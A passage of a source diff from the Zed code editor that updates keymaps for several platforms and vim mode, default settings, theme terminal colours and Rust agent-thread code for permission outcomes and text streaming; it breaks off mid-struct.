"f4": "debugger::Start",
@@ -226,8 +225,8 @@
"context": "ContextEditor > Editor",
"bindings": {
"ctrl-enter": "assistant::Assist",
- "ctrl-s": "workspace::Save",
"save": "workspace::Save",
+ "ctrl-s": "workspace::Save",
"ctrl-<": "assistant::InsertIntoEditor",
"shift-enter": "assistant::Split",
"ctrl-r": "assistant::CycleMessageRole",
@@ -258,7 +257,7 @@
"ctrl-shift-j": "agent::ToggleNavigationMenu",
"ctrl-alt-i": "agent::ToggleOptionsMenu",
"ctrl-alt-shift-n": "agent::ToggleNewThreadMenu",
- "ctrl-alt-shift-t": "agent::ToggleStartThreadInSelector",
+ "ctrl-shift-t": "agent::CycleStartThreadIn",
"shift-alt-escape": "agent::ExpandMessageEditor",
"ctrl->": "agent::AddSelectionToThread",
"ctrl-shift-e": "project_panel::ToggleFocus",
@@ -391,6 +390,14 @@
"ctrl-enter": "search::ReplaceAll",
},
},
+ {
+ "context": "BufferSearchBar && !in_replace > Editor",
+ "use_key_equivalents": true,
+ "bindings": {
+ "ctrl-enter": "editor::Newline",
+ "shift-enter": "search::SelectPreviousMatch",
+ },
+ },
{
"context": "BufferSearchBar && !in_replace > Editor",
"bindings": {
@@ -424,6 +431,12 @@
"ctrl-alt-enter": "search::ReplaceAll",
},
},
+ {
+ "context": "ProjectSearchBar && !in_replace > Editor",
+ "bindings": {
+ "ctrl-enter": "editor::Newline",
+ },
+ },
{
"context": "ProjectSearchView",
"bindings": {
@@ -624,6 +637,7 @@
"ctrl-shift-t": "pane::ReopenClosedItem",
"ctrl-k ctrl-s": "zed::OpenKeymap",
"ctrl-k ctrl-t": "theme_selector::Toggle",
+ "ctrl-k ctrl-shift-t": "theme::ToggleMode",
"ctrl-alt-super-p": "settings_profile_selector::Toggle",
"ctrl-t": "project_symbols::Toggle",
"ctrl-p": "file_finder::Toggle",
@@ -670,13 +684,17 @@
},
},
{
- "context": "WorkspaceSidebar",
+ "context": "ThreadsSidebar",
"use_key_equivalents": true,
"bindings": {
- "ctrl-n": "multi_workspace::NewWorkspaceInWindow",
- "left": "agents_sidebar::CollapseSelectedEntry",
- "right": "agents_sidebar::ExpandSelectedEntry",
+ "ctrl-n": "agents_sidebar::NewThreadInGroup",
+ "left": "menu::SelectParent",
+ "right": "menu::SelectChild",
"enter": "menu::Confirm",
+ "space": "menu::Confirm",
+ "ctrl-f": "agents_sidebar::FocusSidebarFilter",
+ "ctrl-g": "agents_sidebar::ToggleArchive",
+ "shift-backspace": "agent::RemoveSelectedThread",
},
},
{
@@ -766,18 +784,14 @@
"bindings": {
"alt-tab": "editor::AcceptEditPrediction",
"alt-l": "editor::AcceptEditPrediction",
- "tab": "editor::AcceptEditPrediction",
"alt-k": "editor::AcceptNextWordEditPrediction",
"alt-j": "editor::AcceptNextLineEditPrediction",
},
},
{
- "context": "Editor && edit_prediction_conflict",
+ "context": "Editor && edit_prediction && edit_prediction_mode == eager",
"bindings": {
- "alt-tab": "editor::AcceptEditPrediction",
- "alt-l": "editor::AcceptEditPrediction",
- "alt-k": "editor::AcceptNextWordEditPrediction",
- "alt-j": "editor::AcceptNextLineEditPrediction",
+ "tab": "editor::AcceptEditPrediction",
},
},
{
@@ -895,6 +909,8 @@
"ctrl-alt-c": "project_panel::CopyPath",
"alt-shift-copy": "workspace::CopyRelativePath",
"alt-ctrl-shift-c": "workspace::CopyRelativePath",
+ "undo": "project_panel::Undo",
+ "ctrl-z": "project_panel::Undo",
"enter": "project_panel::Rename",
"f2": "project_panel::Rename",
"backspace": ["project_panel::Trash", { "skip_prompt": false }],
@@ -1232,6 +1248,8 @@
"down": "markdown::ScrollDown",
"alt-up": "markdown::ScrollUpByItem",
"alt-down": "markdown::ScrollDownByItem",
+ "ctrl-home": "markdown::ScrollToTop",
+ "ctrl-end": "markdown::ScrollToBottom",
},
},
{
@@ -1320,6 +1338,15 @@
"ctrl-shift-backspace": "git::DeleteWorktree",
},
},
+ {
+ // Handled under a more specific context to avoid conflicts with the
+ // `OpenCurrentFile` keybind from the settings UI
+ "context": "!SettingsWindow",
+ "use_key_equivalents": true,
+ "bindings": {
+ "ctrl-,": "zed::OpenSettings",
+ }
+ },
{
"context": "SettingsWindow",
"use_key_equivalents": true,
@@ -1437,8 +1464,8 @@
{
"context": "GitPicker",
"bindings": {
- "alt-1": "git_picker::ActivateBranchesTab",
- "alt-2": "git_picker::ActivateWorktreesTab",
+ "alt-1": "git_picker::ActivateWorktreesTab",
+ "alt-2": "git_picker::ActivateBranchesTab",
"alt-3": "git_picker::ActivateStashTab",
},
},
@@ -39,7 +39,6 @@
"cmd-+": ["zed::IncreaseBufferFontSize", { "persist": false }],
"cmd--": ["zed::DecreaseBufferFontSize", { "persist": false }],
"cmd-0": ["zed::ResetBufferFontSize", { "persist": false }],
- "cmd-,": "zed::OpenSettings",
"cmd-alt-,": "zed::OpenSettingsFile",
"cmd-q": "zed::Quit",
"cmd-h": "zed::Hide",
@@ -297,7 +296,7 @@
"cmd-shift-j": "agent::ToggleNavigationMenu",
"cmd-alt-m": "agent::ToggleOptionsMenu",
"cmd-alt-shift-n": "agent::ToggleNewThreadMenu",
- "cmd-alt-shift-t": "agent::ToggleStartThreadInSelector",
+ "cmd-shift-t": "agent::CycleStartThreadIn",
"shift-alt-escape": "agent::ExpandMessageEditor",
"cmd->": "agent::AddSelectionToThread",
"cmd-shift-e": "project_panel::ToggleFocus",
@@ -446,6 +445,13 @@
{
"context": "BufferSearchBar && !in_replace > Editor",
"use_key_equivalents": true,
+ "bindings": {
+ "ctrl-enter": "editor::Newline",
+ "shift-enter": "search::SelectPreviousMatch",
+ },
+ },
+ {
+ "context": "BufferSearchBar && !in_replace > Editor",
"bindings": {
"up": "search::PreviousHistoryQuery",
"down": "search::NextHistoryQuery",
@@ -473,7 +479,6 @@
},
{
"context": "ProjectSearchBar > Editor",
- "use_key_equivalents": true,
"bindings": {
"up": "search::PreviousHistoryQuery",
"down": "search::NextHistoryQuery",
@@ -487,6 +492,12 @@
"cmd-enter": "search::ReplaceAll",
},
},
+ {
+ "context": "ProjectSearchBar && !in_replace > Editor",
+ "bindings": {
+ "ctrl-enter": "editor::Newline",
+ },
+ },
{
"context": "ProjectSearchView",
"use_key_equivalents": true,
@@ -691,6 +702,7 @@
"cmd-shift-t": "pane::ReopenClosedItem",
"cmd-k cmd-s": "zed::OpenKeymap",
"cmd-k cmd-t": "theme_selector::Toggle",
+ "cmd-k cmd-shift-t": "theme::ToggleMode",
"ctrl-alt-cmd-p": "settings_profile_selector::Toggle",
"cmd-t": "project_symbols::Toggle",
"cmd-p": "file_finder::Toggle",
@@ -738,13 +750,17 @@
},
},
{
- "context": "WorkspaceSidebar",
+ "context": "ThreadsSidebar",
"use_key_equivalents": true,
"bindings": {
- "cmd-n": "multi_workspace::NewWorkspaceInWindow",
- "left": "agents_sidebar::CollapseSelectedEntry",
- "right": "agents_sidebar::ExpandSelectedEntry",
+ "cmd-n": "agents_sidebar::NewThreadInGroup",
+ "left": "menu::SelectParent",
+ "right": "menu::SelectChild",
"enter": "menu::Confirm",
+ "space": "menu::Confirm",
+ "cmd-f": "agents_sidebar::FocusSidebarFilter",
+ "cmd-g": "agents_sidebar::ToggleArchive",
+ "shift-backspace": "agent::RemoveSelectedThread",
},
},
{
@@ -830,18 +846,14 @@
"context": "Editor && edit_prediction",
"bindings": {
"alt-tab": "editor::AcceptEditPrediction",
- "tab": "editor::AcceptEditPrediction",
"ctrl-cmd-right": "editor::AcceptNextWordEditPrediction",
"ctrl-cmd-down": "editor::AcceptNextLineEditPrediction",
},
},
{
- "context": "Editor && edit_prediction_conflict",
- "use_key_equivalents": true,
+ "context": "Editor && edit_prediction && edit_prediction_mode == eager",
"bindings": {
- "alt-tab": "editor::AcceptEditPrediction",
- "ctrl-cmd-right": "editor::AcceptNextWordEditPrediction",
- "ctrl-cmd-down": "editor::AcceptNextLineEditPrediction",
+ "tab": "editor::AcceptEditPrediction",
},
},
{
@@ -956,6 +968,7 @@
"cmd-v": "project_panel::Paste",
"cmd-alt-c": "workspace::CopyPath",
"alt-cmd-shift-c": "workspace::CopyRelativePath",
+ "cmd-z": "project_panel::Undo",
"enter": "project_panel::Rename",
"f2": "project_panel::Rename",
"backspace": ["project_panel::Trash", { "skip_prompt": false }],
@@ -1338,6 +1351,8 @@
"down": "markdown::ScrollDown",
"alt-up": "markdown::ScrollUpByItem",
"alt-down": "markdown::ScrollDownByItem",
+ "cmd-up": "markdown::ScrollToTop",
+ "cmd-down": "markdown::ScrollToBottom",
},
},
{
@@ -1425,6 +1440,15 @@
"cmd-shift-backspace": "git::DeleteWorktree",
},
},
+ {
+ // Handled under a more specific context to avoid conflicts with the
+ // `OpenCurrentFile` keybind from the settings UI
+ "context": "!SettingsWindow",
+ "use_key_equivalents": true,
+ "bindings": {
+ "cmd-,": "zed::OpenSettings",
+ }
+ },
{
"context": "SettingsWindow",
"use_key_equivalents": true,
@@ -1515,8 +1539,8 @@
{
"context": "GitPicker",
"bindings": {
- "cmd-1": "git_picker::ActivateBranchesTab",
- "cmd-2": "git_picker::ActivateWorktreesTab",
+ "cmd-1": "git_picker::ActivateWorktreesTab",
+ "cmd-2": "git_picker::ActivateBranchesTab",
"cmd-3": "git_picker::ActivateStashTab",
},
},
@@ -30,7 +30,6 @@
"ctrl-shift-=": ["zed::IncreaseBufferFontSize", { "persist": false }],
"ctrl--": ["zed::DecreaseBufferFontSize", { "persist": false }],
"ctrl-0": ["zed::ResetBufferFontSize", { "persist": false }],
- "ctrl-,": "zed::OpenSettings",
"ctrl-alt-,": "zed::OpenSettingsFile",
"ctrl-q": "zed::Quit",
"f4": "debugger::Start",
@@ -259,7 +258,7 @@
"shift-alt-j": "agent::ToggleNavigationMenu",
"shift-alt-i": "agent::ToggleOptionsMenu",
"ctrl-shift-alt-n": "agent::ToggleNewThreadMenu",
- "ctrl-shift-alt-t": "agent::ToggleStartThreadInSelector",
+ "ctrl-shift-t": "agent::CycleStartThreadIn",
"shift-alt-escape": "agent::ExpandMessageEditor",
"ctrl-shift-.": "agent::AddSelectionToThread",
"ctrl-shift-e": "project_panel::ToggleFocus",
@@ -398,6 +397,13 @@
{
"context": "BufferSearchBar && !in_replace > Editor",
"use_key_equivalents": true,
+ "bindings": {
+ "ctrl-enter": "editor::Newline",
+ "shift-enter": "search::SelectPreviousMatch",
+ },
+ },
+ {
+ "context": "BufferSearchBar && !in_replace > Editor",
"bindings": {
"up": "search::PreviousHistoryQuery",
"down": "search::NextHistoryQuery",
@@ -415,7 +421,6 @@
},
{
"context": "ProjectSearchBar > Editor",
- "use_key_equivalents": true,
"bindings": {
"up": "search::PreviousHistoryQuery",
"down": "search::NextHistoryQuery",
@@ -429,6 +434,12 @@
"ctrl-alt-enter": "search::ReplaceAll",
},
},
+ {
+ "context": "ProjectSearchBar && !in_replace > Editor",
+ "bindings": {
+ "ctrl-enter": "editor::Newline",
+ },
+ },
{
"context": "ProjectSearchView",
"use_key_equivalents": true,
@@ -616,6 +627,7 @@
"ctrl-shift-t": "pane::ReopenClosedItem",
"ctrl-k ctrl-s": "zed::OpenKeymap",
"ctrl-k ctrl-t": "theme_selector::Toggle",
+ "ctrl-k ctrl-shift-t": "theme::ToggleMode",
"ctrl-alt-super-p": "settings_profile_selector::Toggle",
"ctrl-t": "project_symbols::Toggle",
"ctrl-p": "file_finder::Toggle",
@@ -674,13 +686,17 @@
},
},
{
- "context": "WorkspaceSidebar",
+ "context": "ThreadsSidebar",
"use_key_equivalents": true,
"bindings": {
- "ctrl-n": "multi_workspace::NewWorkspaceInWindow",
- "left": "agents_sidebar::CollapseSelectedEntry",
- "right": "agents_sidebar::ExpandSelectedEntry",
+ "ctrl-n": "agents_sidebar::NewThreadInGroup",
+ "left": "menu::SelectParent",
+ "right": "menu::SelectChild",
"enter": "menu::Confirm",
+ "space": "menu::Confirm",
+ "ctrl-f": "agents_sidebar::FocusSidebarFilter",
+ "ctrl-g": "agents_sidebar::ToggleArchive",
+ "shift-backspace": "agent::RemoveSelectedThread",
},
},
{
@@ -762,19 +778,15 @@
"bindings": {
"alt-tab": "editor::AcceptEditPrediction",
"alt-l": "editor::AcceptEditPrediction",
- "tab": "editor::AcceptEditPrediction",
"alt-k": "editor::AcceptNextWordEditPrediction",
"alt-j": "editor::AcceptNextLineEditPrediction",
},
},
{
- "context": "Editor && edit_prediction_conflict",
+ "context": "Editor && edit_prediction && edit_prediction_mode == eager",
"use_key_equivalents": true,
"bindings": {
- "alt-tab": "editor::AcceptEditPrediction",
- "alt-l": "editor::AcceptEditPrediction",
- "alt-k": "editor::AcceptNextWordEditPrediction",
- "alt-j": "editor::AcceptNextLineEditPrediction",
+ "tab": "editor::AcceptEditPrediction",
},
},
{
@@ -893,6 +905,7 @@
"ctrl-v": "project_panel::Paste",
"shift-alt-c": "project_panel::CopyPath",
"ctrl-k ctrl-shift-c": "workspace::CopyRelativePath",
+ "ctrl-z": "project_panel::Undo",
"enter": "project_panel::Rename",
"f2": "project_panel::Rename",
"backspace": ["project_panel::Trash", { "skip_prompt": false }],
@@ -1261,6 +1274,8 @@
"down": "markdown::ScrollDown",
"alt-up": "markdown::ScrollUpByItem",
"alt-down": "markdown::ScrollDownByItem",
+ "ctrl-home": "markdown::ScrollToTop",
+ "ctrl-end": "markdown::ScrollToBottom",
},
},
{
@@ -1341,6 +1356,15 @@
"ctrl-shift-backspace": "git::DeleteWorktree",
},
},
+ {
+ // Handled under a more specific context to avoid conflicts with the
+ // `OpenCurrentFile` keybind from the settings UI
+ "context": "!SettingsWindow",
+ "use_key_equivalents": true,
+ "bindings": {
+ "ctrl-,": "zed::OpenSettings",
+ }
+ },
{
"context": "SettingsWindow",
"use_key_equivalents": true,
@@ -1430,8 +1454,8 @@
{
"context": "GitPicker",
"bindings": {
- "alt-1": "git_picker::ActivateBranchesTab",
- "alt-2": "git_picker::ActivateWorktreesTab",
+ "alt-1": "git_picker::ActivateWorktreesTab",
+ "alt-2": "git_picker::ActivateBranchesTab",
"alt-3": "git_picker::ActivateStashTab",
},
},
@@ -33,6 +33,7 @@
"cmd-+": "editor::UnfoldLines",
"alt-shift-g": "editor::SplitSelectionIntoLines",
"ctrl-g": ["editor::SelectNext", { "replace_newest": false }],
+ "ctrl-shift-g": "editor::UndoSelection",
"ctrl-cmd-g": ["editor::SelectPrevious", { "replace_newest": false }],
"cmd-/": ["editor::ToggleComments", { "advance_downwards": true }],
"alt-up": "editor::SelectLargerSyntaxNode",
@@ -427,6 +427,7 @@
"escape": "vim::SwitchToHelixNormalMode",
"i": "vim::HelixInsert",
"a": "vim::HelixAppend",
+ "shift-a": "vim::HelixInsertEndOfLine",
"ctrl-[": "editor::Cancel",
},
},
@@ -510,8 +511,8 @@
"g shift-u": "git::UnstageAndNext", // Zed specific
// Window mode
- "space w v": "pane::SplitDown",
- "space w s": "pane::SplitRight",
+ "space w v": "pane::SplitRight",
+ "space w s": "pane::SplitDown",
"space w h": "workspace::ActivatePaneLeft",
"space w j": "workspace::ActivatePaneDown",
"space w k": "workspace::ActivatePaneUp",
@@ -1059,7 +1060,7 @@
},
},
{
- "context": "Editor && edit_prediction",
+ "context": "Editor && edit_prediction && edit_prediction_mode == eager",
"bindings": {
// This is identical to the binding in the base keymap, but the vim bindings above to
// "vim::Tab" shadow it, so it needs to be bound again.
@@ -1072,15 +1073,7 @@
"enter": "agent::Chat",
},
},
- {
- "context": "os != macos && Editor && edit_prediction_conflict",
- "bindings": {
- // alt-l is provided as an alternative to tab/alt-tab. and will be displayed in the UI. This
- // is because alt-tab may not be available, as it is often used for window switching on Linux
- // and Windows.
- "alt-l": "editor::AcceptEditPrediction",
- },
- },
+
{
"context": "SettingsWindow > NavigationMenu && !search",
"bindings": {
@@ -1099,6 +1092,8 @@
"ctrl-d": "markdown::ScrollPageDown",
"ctrl-y": "markdown::ScrollUp",
"ctrl-e": "markdown::ScrollDown",
+ "g g": "markdown::ScrollToTop",
+ "shift-g": "markdown::ScrollToBottom",
},
},
{
@@ -1118,4 +1113,31 @@
"k": "notebook::NotebookMoveUp",
},
},
+ {
+ "context": "ThreadsSidebar && !Editor",
+ "bindings": {
+ "j": "menu::SelectNext",
+ "k": "menu::SelectPrevious",
+ "h": "menu::SelectParent",
+ "l": "menu::SelectChild",
+ "g g": "menu::SelectFirst",
+ "shift-g": "menu::SelectLast",
+ "/": "agents_sidebar::FocusSidebarFilter",
+ "z a": "editor::ToggleFold",
+ "z c": "menu::SelectParent",
+ "z o": "menu::SelectChild",
+ "z shift-m": "editor::FoldAll",
+ "z shift-r": "editor::UnfoldAll",
+ },
+ },
+ {
+ "context": "ThreadsSidebar > Editor && VimControl && vim_mode == normal",
+ "bindings": {
+ "j": "editor::MoveDown",
+ "k": "editor::MoveUp",
+ "/": "vim::SwitchToInsertMode",
+ "escape": "menu::Cancel",
+ "enter": "editor::Newline",
+ },
+ },
]
@@ -460,12 +460,10 @@
"show_sign_in": true,
// Whether to show the menus in the titlebar.
"show_menus": false,
+ // The layout of window control buttons in the title bar (Linux only).
+ "button_layout": "platform_default",
},
"audio": {
- // Opt into the new audio system.
- "experimental.rodio_audio": false,
- // Requires 'rodio_audio: true'
- //
// Automatically increase or decrease you microphone's volume. This affects how
// loud you sound to others.
//
@@ -474,33 +472,10 @@
// audio and has auto speaker volume on this will make you very loud
// compared to other speakers.
"experimental.auto_microphone_volume": false,
- // Requires 'rodio_audio: true'
- //
- // Automatically increate or decrease the volume of other call members.
- // This only affects how things sound for you.
- "experimental.auto_speaker_volume": true,
- // Requires 'rodio_audio: true'
- //
- // Remove background noises. Works great for typing, cars, dogs, AC. Does
- // not work well on music.
- "experimental.denoise": true,
- // Requires 'rodio_audio: true'
- //
- // Use audio parameters compatible with the previous versions of
- // experimental audio and non-experimental audio. When this is false you
- // will sound strange to anyone not on the latest experimental audio. In
- // the future we will migrate by setting this to false
- //
- // You need to rejoin a call for this setting to apply
- "experimental.legacy_audio_compatible": true,
- // Requires 'rodio_audio: true'
- //
// Select specific output audio device.
// `null` means use system default.
// Any unrecognized output device will fall back to system default.
"experimental.output_audio_device": null,
- // Requires 'rodio_audio: true'
- //
// Select specific input audio device.
// `null` means use system default.
// Any unrecognized input device will fall back to system default.
@@ -768,6 +743,9 @@
// 5. Never show the scrollbar:
// "never"
"show": null,
+ // Whether to allow horizontal scrolling in the project panel.
+ // When false, the view is locked to the leftmost position and long file names are clipped.
+ "horizontal_scroll": true,
},
// Which files containing diagnostic errors/warnings to mark in the project panel.
// This setting can take the following three values:
@@ -895,6 +873,14 @@
// Choices: label_color, icon
// Default: icon
"status_style": "icon",
+ // Whether to show file icons in the git panel.
+ //
+ // Default: false
+ "file_icons": false,
+ // Whether to show folder icons or chevrons for directories in the git panel.
+ //
+ // Default: true
+ "folder_icons": true,
// What branch name to use if `init.defaultBranch` is not set
//
// Default: main
@@ -911,6 +897,14 @@
///
/// Default: false
"tree_view": false,
+ // Whether the git panel should open on startup.
+ //
+ // Default: false
+ "starts_open": false,
+ // Whether to show a badge on the git panel icon with the count of uncommitted changes.
+ //
+ // Default: false
+ "show_count_badge": false,
"scrollbar": {
// When to show the scrollbar in the git panel.
//
@@ -920,8 +914,8 @@
},
// Whether to show the addition/deletion change count next to each file in the Git panel.
//
- // Default: false
- "diff_stats": false,
+ // Default: true
+ "diff_stats": true,
},
"message_editor": {
// Whether to automatically replace emoji shortcodes with emoji characters.
@@ -935,6 +929,8 @@
"dock": "right",
// Default width of the notification panel.
"default_width": 380,
+ // Whether to show a badge on the notification panel icon with the count of unread notifications.
+ "show_count_badge": false,
},
"agent": {
// Whether the inline assistant should use streaming tools, when available
@@ -1052,6 +1048,7 @@
"spawn_agent": true,
"terminal": true,
"thinking": true,
+ "update_plan": true,
"web_search": true,
},
},
@@ -1071,6 +1068,7 @@
"grep": true,
"spawn_agent": true,
"thinking": true,
+ "update_plan": true,
"web_search": true,
},
},
@@ -1080,6 +1078,10 @@
"tools": {},
},
},
+ // Whether to start a new thread in the current local project or in a new Git worktree.
+ //
+ // Default: local_project
+ "new_thread_location": "local_project",
// Where to show notifications when the agent has either completed
// its response, or else needs confirmation before it can run a
// tool action.
@@ -1282,6 +1284,8 @@
// * "indexed": Use only the files Zed had indexed
// * "smart": Be smart and search for ignored when called from a gitignored worktree
"include_ignored": "smart",
+ // Whether to include text channels in file finder results.
+ "include_channels": false,
},
// Whether or not to remove any trailing whitespace from lines of a buffer
// before saving it.
@@ -1850,6 +1854,8 @@
// Timeout for hover and Cmd-click path hyperlink discovery in milliseconds. Specifying a
// timeout of `0` will disable path hyperlinking in terminal.
"path_hyperlink_timeout_ms": 1,
+ // Whether to show a badge on the terminal panel icon with the count of open terminals.
+ "show_count_badge": false,
},
"code_actions_on_format": {},
// Settings related to running tasks.
@@ -2143,7 +2149,7 @@
},
},
"Starlark": {
- "language_servers": ["starpls", "!buck2-lsp", "..."],
+ "language_servers": ["starpls", "!buck2-lsp", "!tilt", "..."],
},
"Svelte": {
"language_servers": ["svelte-language-server", "..."],
@@ -2214,6 +2220,9 @@
"api_url": "https://api.openai.com/v1",
},
"openai_compatible": {},
+ "opencode": {
+ "api_url": "https://opencode.ai/zen",
+ },
"open_router": {
"api_url": "https://openrouter.ai/api/v1",
},
@@ -119,6 +119,16 @@
"style": ["type"],
},
// References
+ {
+ "token_type": "parameter",
+ "token_modifiers": ["declaration"],
+ "style": ["variable.parameter"]
+ },
+ {
+ "token_type": "parameter",
+ "token_modifiers": ["definition"],
+ "style": ["variable.parameter"]
+ },
{
"token_type": "parameter",
"token_modifiers": [],
@@ -201,6 +211,11 @@
"token_modifiers": [],
"style": ["comment"],
},
+ {
+ "token_type": "string",
+ "token_modifiers": ["documentation"],
+ "style": ["string.doc"],
+ },
{
"token_type": "string",
"token_modifiers": [],
@@ -48,6 +48,11 @@
"show_summary": true,
// Whether to show the command line in the output of the spawned task, defaults to `true`.
"show_command": true,
+ // Which edited buffers to save before running the task:
+ // * `all` — save all edited buffers
+ // * `current` — save current buffer only
+ // * `none` — don't save any buffers
+ "save": "all",
// Represents the tags for inline runnable indicators, or spawning multiple tasks at once.
// "tags": []
},
@@ -71,31 +71,31 @@
"terminal.background": "#0d1016ff",
"terminal.foreground": "#bfbdb6ff",
"terminal.bright_foreground": "#bfbdb6ff",
- "terminal.dim_foreground": "#0d1016ff",
+ "terminal.dim_foreground": "#85847fff",
"terminal.ansi.black": "#0d1016ff",
"terminal.ansi.bright_black": "#545557ff",
- "terminal.ansi.dim_black": "#bfbdb6ff",
+ "terminal.ansi.dim_black": "#3a3b3cff",
"terminal.ansi.red": "#ef7177ff",
"terminal.ansi.bright_red": "#83353bff",
- "terminal.ansi.dim_red": "#febab9ff",
+ "terminal.ansi.dim_red": "#a74f53ff",
"terminal.ansi.green": "#aad84cff",
"terminal.ansi.bright_green": "#567627ff",
- "terminal.ansi.dim_green": "#d8eca8ff",
+ "terminal.ansi.dim_green": "#769735ff",
"terminal.ansi.yellow": "#feb454ff",
"terminal.ansi.bright_yellow": "#92582bff",
- "terminal.ansi.dim_yellow": "#ffd9aaff",
+ "terminal.ansi.dim_yellow": "#b17d3aff",
"terminal.ansi.blue": "#5ac1feff",
"terminal.ansi.bright_blue": "#27618cff",
- "terminal.ansi.dim_blue": "#b7dffeff",
+ "terminal.ansi.dim_blue": "#3e87b1ff",
"terminal.ansi.magenta": "#39bae5ff",
"terminal.ansi.bright_magenta": "#205a78ff",
- "terminal.ansi.dim_magenta": "#addcf3ff",
+ "terminal.ansi.dim_magenta": "#2782a0ff",
"terminal.ansi.cyan": "#95e5cbff",
"terminal.ansi.bright_cyan": "#4c806fff",
- "terminal.ansi.dim_cyan": "#cbf2e4ff",
+ "terminal.ansi.dim_cyan": "#68a08eff",
"terminal.ansi.white": "#bfbdb6ff",
"terminal.ansi.bright_white": "#fafafaff",
- "terminal.ansi.dim_white": "#787876ff",
+ "terminal.ansi.dim_white": "#85847fff",
"link_text.hover": "#5ac1feff",
"conflict": "#feb454ff",
"conflict.background": "#572815ff",
@@ -855,31 +855,31 @@
"terminal.background": "#242835ff",
"terminal.foreground": "#cccac2ff",
"terminal.bright_foreground": "#cccac2ff",
- "terminal.dim_foreground": "#242835ff",
+ "terminal.dim_foreground": "#8e8d87ff",
"terminal.ansi.black": "#242835ff",
"terminal.ansi.bright_black": "#67696eff",
- "terminal.ansi.dim_black": "#cccac2ff",
+ "terminal.ansi.dim_black": "#48494dff",
"terminal.ansi.red": "#f18779ff",
"terminal.ansi.bright_red": "#833f3cff",
- "terminal.ansi.dim_red": "#fec4baff",
+ "terminal.ansi.dim_red": "#a85e54ff",
"terminal.ansi.green": "#d5fe80ff",
"terminal.ansi.bright_green": "#75993cff",
- "terminal.ansi.dim_green": "#ecffc1ff",
+ "terminal.ansi.dim_green": "#95b159ff",
"terminal.ansi.yellow": "#fecf72ff",
"terminal.ansi.bright_yellow": "#937237ff",
- "terminal.ansi.dim_yellow": "#ffe7b9ff",
+ "terminal.ansi.dim_yellow": "#b1904fff",
"terminal.ansi.blue": "#72cffeff",
"terminal.ansi.bright_blue": "#336d8dff",
- "terminal.ansi.dim_blue": "#c1e7ffff",
+ "terminal.ansi.dim_blue": "#4f90b1ff",
"terminal.ansi.magenta": "#5bcde5ff",
"terminal.ansi.bright_magenta": "#2b6c7bff",
- "terminal.ansi.dim_magenta": "#b7e7f2ff",
+ "terminal.ansi.dim_magenta": "#3f8fa0ff",
"terminal.ansi.cyan": "#95e5cbff",
"terminal.ansi.bright_cyan": "#4c806fff",
- "terminal.ansi.dim_cyan": "#cbf2e4ff",
+ "terminal.ansi.dim_cyan": "#68a08eff",
"terminal.ansi.white": "#cccac2ff",
"terminal.ansi.bright_white": "#fafafaff",
- "terminal.ansi.dim_white": "#898a8aff",
+ "terminal.ansi.dim_white": "#8e8d87ff",
"link_text.hover": "#72cffeff",
"conflict": "#fecf72ff",
"conflict.background": "#574018ff",
@@ -31,6 +31,8 @@ use task::{Shell, ShellBuilder};
pub use terminal::*;
use text::Bias;
use ui::App;
+use util::markdown::MarkdownEscaped;
+use util::path_list::PathList;
use util::{ResultExt, get_default_system_shell_preferring_bash, paths::PathStyle};
use uuid::Uuid;
@@ -245,6 +247,8 @@ impl ToolCall {
) -> Result<Self> {
let title = if tool_call.kind == acp::ToolKind::Execute {
tool_call.title
+ } else if tool_call.kind == acp::ToolKind::Edit {
+ MarkdownEscaped(tool_call.title.as_str()).to_string()
} else if let Some((first_line, _)) = tool_call.title.split_once("\n") {
first_line.to_owned() + "…"
} else {
@@ -333,6 +337,8 @@ impl ToolCall {
self.label.update(cx, |label, cx| {
if self.kind == acp::ToolKind::Execute {
label.replace(title, cx);
+ } else if self.kind == acp::ToolKind::Edit {
+ label.replace(MarkdownEscaped(&title).to_string(), cx)
} else if let Some((first_line, _)) = title.split_once("\n") {
label.replace(first_line.to_owned() + "…", cx);
} else {
@@ -488,6 +494,54 @@ impl From<&ResolvedLocation> for AgentLocation {
}
}
+#[derive(Debug, Clone)]
+pub enum SelectedPermissionParams {
+ Terminal { patterns: Vec<String> },
+}
+
+#[derive(Debug)]
+pub struct SelectedPermissionOutcome {
+ pub option_id: acp::PermissionOptionId,
+ pub option_kind: acp::PermissionOptionKind,
+ pub params: Option<SelectedPermissionParams>,
+}
+
+impl SelectedPermissionOutcome {
+ pub fn new(option_id: acp::PermissionOptionId, option_kind: acp::PermissionOptionKind) -> Self {
+ Self {
+ option_id,
+ option_kind,
+ params: None,
+ }
+ }
+
+ pub fn params(mut self, params: Option<SelectedPermissionParams>) -> Self {
+ self.params = params;
+ self
+ }
+}
+
+impl From<SelectedPermissionOutcome> for acp::SelectedPermissionOutcome {
+ fn from(value: SelectedPermissionOutcome) -> Self {
+ Self::new(value.option_id)
+ }
+}
+
+#[derive(Debug)]
+pub enum RequestPermissionOutcome {
+ Cancelled,
+ Selected(SelectedPermissionOutcome),
+}
+
+impl From<RequestPermissionOutcome> for acp::RequestPermissionOutcome {
+ fn from(value: RequestPermissionOutcome) -> Self {
+ match value {
+ RequestPermissionOutcome::Cancelled => Self::Cancelled,
+ RequestPermissionOutcome::Selected(outcome) => Self::Selected(outcome.into()),
+ }
+ }
+}
+
#[derive(Debug)]
pub enum ToolCallStatus {
/// The tool call hasn't started running yet, but we start showing it to
@@ -496,7 +550,7 @@ pub enum ToolCallStatus {
/// The tool call is waiting for confirmation from the user.
WaitingForConfirmation {
options: PermissionOptions,
- respond_tx: oneshot::Sender<acp::PermissionOptionId>,
+ respond_tx: oneshot::Sender<SelectedPermissionOutcome>,
},
/// The tool call is currently running.
InProgress,
@@ -866,6 +920,7 @@ impl Plan {
}
acp::PlanEntryStatus::InProgress => {
stats.in_progress_entry = stats.in_progress_entry.or(Some(entry));
+ stats.pending += 1;
}
acp::PlanEntryStatus::Completed => {
stats.completed += 1;
@@ -953,9 +1008,9 @@ struct RunningTurn {
pub struct AcpThread {
session_id: acp::SessionId,
- cwd: Option<PathBuf>,
+ work_dirs: Option<PathList>,
parent_session_id: Option<acp::SessionId>,
- title: SharedString,
+ title: Option<SharedString>,
provisional_title: Option<SharedString>,
entries: Vec<AgentThreadEntry>,
plan: Plan,
@@ -976,6 +1031,30 @@ pub struct AcpThread {
draft_prompt: Option<Vec<acp::ContentBlock>>,
/// The initial scroll position for the thread view, set during session registration.
ui_scroll_position: Option<gpui::ListOffset>,
+ /// Buffer for smooth text streaming. Holds text that has been received from
+ /// the model but not yet revealed in the UI. A timer task drains this buffer
+ /// gradually to create a fluid typing effect instead of choppy chunk-at-a-time
+ /// updates.
+ streaming_text_buffer: Option<StreamingTextBuffer>,
+}
+
+struct StreamingTextBuffer {
